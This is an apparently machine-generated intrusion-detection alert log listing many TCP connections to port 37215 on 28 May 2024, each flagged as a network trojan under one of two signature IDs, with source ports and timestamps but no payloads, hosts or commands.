                  Source Port:41050
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.701034
                  SID:2829579
                  Source Port:34884
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.847431
                  SID:2835222
                  Source Port:55606
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.907992
                  SID:2835222
                  Source Port:53118
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.659004
                  SID:2829579
                  Source Port:60626
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.315635
                  SID:2829579
                  Source Port:41586
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.661348
                  SID:2829579
                  Source Port:46082
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.292813
                  SID:2829579
                  Source Port:42382
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.771095
                  SID:2835222
                  Source Port:40712
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.587129
                  SID:2835222
                  Source Port:44694
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.659921
                  SID:2829579
                  Source Port:48390
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.563574
                  SID:2835222
                  Source Port:42390
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.322583
                  SID:2835222
                  Source Port:33734
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.278697
                  SID:2829579
                  Source Port:41618
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.295998
                  SID:2829579
                  Source Port:55164
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.702267
                  SID:2835222
                  Source Port:34570
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.584437
                  SID:2829579
                  Source Port:40200
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.821112
                  SID:2829579
                  Source Port:43646
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.495856
                  SID:2835222
                  Source Port:53902
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.886757
                  SID:2829579
                  Source Port:42902
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.298551
                  SID:2829579
                  Source Port:59670
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.585438
                  SID:2835222
                  Source Port:48830
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.768766
                  SID:2835222
                  Source Port:49190
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.604557
                  SID:2829579
                  Source Port:56800
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.788939
                  SID:2829579
                  Source Port:50884
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.846013
                  SID:2835222
                  Source Port:54916
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.847675
                  SID:2829579
                  Source Port:41330
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.719087
                  SID:2829579
                  Source Port:53662
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:28.922675
                  SID:2829579
                  Source Port:45642
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.491858
                  SID:2829579
                  Source Port:42758
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.578658
                  SID:2835222
                  Source Port:34124
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.649729
                  SID:2829579
                  Source Port:43146
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.907860
                  SID:2835222
                  Source Port:57268
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.489394
                  SID:2829579
                  Source Port:34158
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.279087
                  SID:2829579
                  Source Port:33500
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.695230
                  SID:2835222
                  Source Port:37038
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.579787
                  SID:2835222
                  Source Port:35272
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.886658
                  SID:2829579
                  Source Port:38474
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.551044
                  SID:2829579
                  Source Port:35612
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.678828
                  SID:2835222
                  Source Port:40906
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.742627
                  SID:2829579
                  Source Port:35098
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.843882
                  SID:2829579
                  Source Port:40856
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.810453
                  SID:2829579
                  Source Port:36140
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.906675
                  SID:2829579
                  Source Port:37116
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.372035
                  SID:2829579
                  Source Port:46814
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.907619
                  SID:2835222
                  Source Port:34980
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.536245
                  SID:2835222
                  Source Port:39360
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.312563
                  SID:2835222
                  Source Port:47422
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:28.922689
                  SID:2835222
                  Source Port:42160
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.483047
                  SID:2835222
                  Source Port:33070
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.789480
                  SID:2829579
                  Source Port:34988
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.845956
                  SID:2835222
                  Source Port:49508
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.542566
                  SID:2835222
                  Source Port:49230
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.885473
                  SID:2829579
                  Source Port:46914
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.659267
                  SID:2835222
                  Source Port:45904
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.908983
                  SID:2835222
                  Source Port:58178
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.910506
                  SID:2835222
                  Source Port:59008
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.872235
                  SID:2835222
                  Source Port:51054
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.719876
                  SID:2829579
                  Source Port:52662
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.931680
                  SID:2829579
                  Source Port:54548
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.789786
                  SID:2835222
                  Source Port:42784
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.795790
                  SID:2835222
                  Source Port:47042
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.578678
                  SID:2835222
                  Source Port:39706
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.586915
                  SID:2835222
                  Source Port:37910
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.791641
                  SID:2835222
                  Source Port:40160
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.788846
                  SID:2835222
                  Source Port:37508
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.818066
                  SID:2829579
                  Source Port:49592
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.788100
                  SID:2829579
                  Source Port:53300
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.488150
                  SID:2829579
                  Source Port:39102
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.766208
                  SID:2829579
                  Source Port:48596
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.846576
                  SID:2835222
                  Source Port:37728
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.494530
                  SID:2835222
                  Source Port:60156
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.627798
                  SID:2835222
                  Source Port:38392
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.661172
                  SID:2835222
                  Source Port:59176
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.300200
                  SID:2829579
                  Source Port:44116
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.576433
                  SID:2835222
                  Source Port:33406
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.592816
                  SID:2829579
                  Source Port:44224
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.912845
                  SID:2829579
                  Source Port:44882
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.719146
                  SID:2835222
                  Source Port:38410
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.492444
                  SID:2829579
                  Source Port:55368
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.277650
                  SID:2829579
                  Source Port:34404
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.660986
                  SID:2835222
                  Source Port:49296
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.768715
                  SID:2835222
                  Source Port:33852
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.579003
                  SID:2829579
                  Source Port:54678
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.908617
                  SID:2835222
                  Source Port:43898
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.655670
                  SID:2829579
                  Source Port:58910
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.729756
                  SID:2835222
                  Source Port:33184
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.583463
                  SID:2829579
                  Source Port:46104
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.528091
                  SID:2829579
                  Source Port:57622
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.649576
                  SID:2829579
                  Source Port:45668
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.789440
                  SID:2829579
                  Source Port:47998
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.720783
                  SID:2835222
                  Source Port:36204
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.765351
                  SID:2829579
                  Source Port:54626
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.720296
                  SID:2835222
                  Source Port:56132
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.659915
                  SID:2829579
                  Source Port:37300
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.529101
                  SID:2829579
                  Source Port:41468
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.323478
                  SID:2835222
                  Source Port:40718
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.749972
                  SID:2835222
                  Source Port:51924
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.908507
                  SID:2835222
                  Source Port:54198
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.788845
                  SID:2835222
                  Source Port:50732
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.696061
                  SID:2829579
                  Source Port:54872
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.536569
                  SID:2835222
                  Source Port:36534
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.845963
                  SID:2829579
                  Source Port:49196
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.695714
                  SID:2829579
                  Source Port:43090
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.780999
                  SID:2835222
                  Source Port:48306
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.544286
                  SID:2835222
                  Source Port:37054
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.629089
                  SID:2829579
                  Source Port:56620
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.795434
                  SID:2835222
                  Source Port:36992
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.920416
                  SID:2835222
                  Source Port:42170
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.578990
                  SID:2829579
                  Source Port:58662
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.791325
                  SID:2829579
                  Source Port:38176
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.907950
                  SID:2835222
                  Source Port:57468
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.884902
                  SID:2835222
                  Source Port:56948
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.585579
                  SID:2829579
                  Source Port:59740
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.887888
                  SID:2829579
                  Source Port:46330
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.661239
                  SID:2829579
                  Source Port:43214
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.659255
                  SID:2829579
                  Source Port:42966
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.886654
                  SID:2829579
                  Source Port:36862
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.887204
                  SID:2829579
                  Source Port:53746
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.790739
                  SID:2829579
                  Source Port:51028
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.799472
                  SID:2829579
                  Source Port:56558
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.845753
                  SID:2829579
                  Source Port:40738
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.660549
                  SID:2829579
                  Source Port:53854
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.911651
                  SID:2835222
                  Source Port:35408
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:12.604401
                  SID:2829579
                  Source Port:42656
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.745936
                  SID:2829579
                  Source Port:59442
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.312551
                  SID:2829579
                  Source Port:53688
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.788927
                  SID:2835222
                  Source Port:53462
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.790301
                  SID:2829579
                  Source Port:38500
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.843844
                  SID:2835222
                  Source Port:41968
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.527983
                  SID:2829579
                  Source Port:45978
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.770937
                  SID:2829579
                  Source Port:38234
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.649555
                  SID:2829579
                  Source Port:44482
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.587905
                  SID:2829579
                  Source Port:48766
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.497256
                  SID:2829579
                  Source Port:39488
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.577101
                  SID:2835222
                  Source Port:53568
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.577751
                  SID:2829579
                  Source Port:43796
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.798245
                  SID:2829579
                  Source Port:43990
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.529238
                  SID:2829579
                  Source Port:41666
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.576131
                  SID:2829579
                  Source Port:49526
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.549282
                  SID:2835222
                  Source Port:34486
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.888374
                  SID:2829579
                  Source Port:58508
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.847708
                  SID:2829579
                  Source Port:34490
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.528967
                  SID:2835222
                  Source Port:57778
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.910965
                  SID:2829579
                  Source Port:53002
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.627958
                  SID:2835222
                  Source Port:36858
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.683047
                  SID:2835222
                  Source Port:45836
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.537050
                  SID:2829579
                  Source Port:54498
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.664770
                  SID:2835222
                  Source Port:40572
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.845740
                  SID:2829579
                  Source Port:46298
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.796825
                  SID:2835222
                  Source Port:46702
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.781010
                  SID:2829579
                  Source Port:50494
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.292806
                  SID:2829579
                  Source Port:35284
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.316576
                  SID:2829579
                  Source Port:60716
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.795805
                  SID:2835222
                  Source Port:42282
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.847236
                  SID:2835222
                  Source Port:57250
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.528234
                  SID:2835222
                  Source Port:36062
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.845224
                  SID:2835222
                  Source Port:58710
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.658013
                  SID:2835222
                  Source Port:40102
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.737931
                  SID:2835222
                  Source Port:39332
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.488885
                  SID:2829579
                  Source Port:53724
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.887868
                  SID:2829579
                  Source Port:39556
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.771309
                  SID:2835222
                  Source Port:43876
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.737607
                  SID:2835222
                  Source Port:38998
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.604038
                  SID:2835222
                  Source Port:43072
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.649844
                  SID:2835222
                  Source Port:57380
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.673600
                  SID:2829579
                  Source Port:36682
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.806398
                  SID:2835222
                  Source Port:57336
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.523610
                  SID:2829579
                  Source Port:60388
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.584438
                  SID:2835222
                  Source Port:45998
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.536568
                  SID:2829579
                  Source Port:57744
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.907642
                  SID:2829579
                  Source Port:52770
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.598243
                  SID:2835222
                  Source Port:58614
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.312570
                  SID:2829579
                  Source Port:39456
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.527428
                  SID:2835222
                  Source Port:46004
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.713741
                  SID:2829579
                  Source Port:33258
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.316515
                  SID:2829579
                  Source Port:50016
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.661548
                  SID:2829579
                  Source Port:47376
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.908546
                  SID:2835222
                  Source Port:53474
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.844943
                  SID:2835222
                  Source Port:37220
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.296251
                  SID:2835222
                  Source Port:51646
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.791643
                  SID:2829579
                  Source Port:58362
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.793688
                  SID:2829579
                  Source Port:43712
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.790352
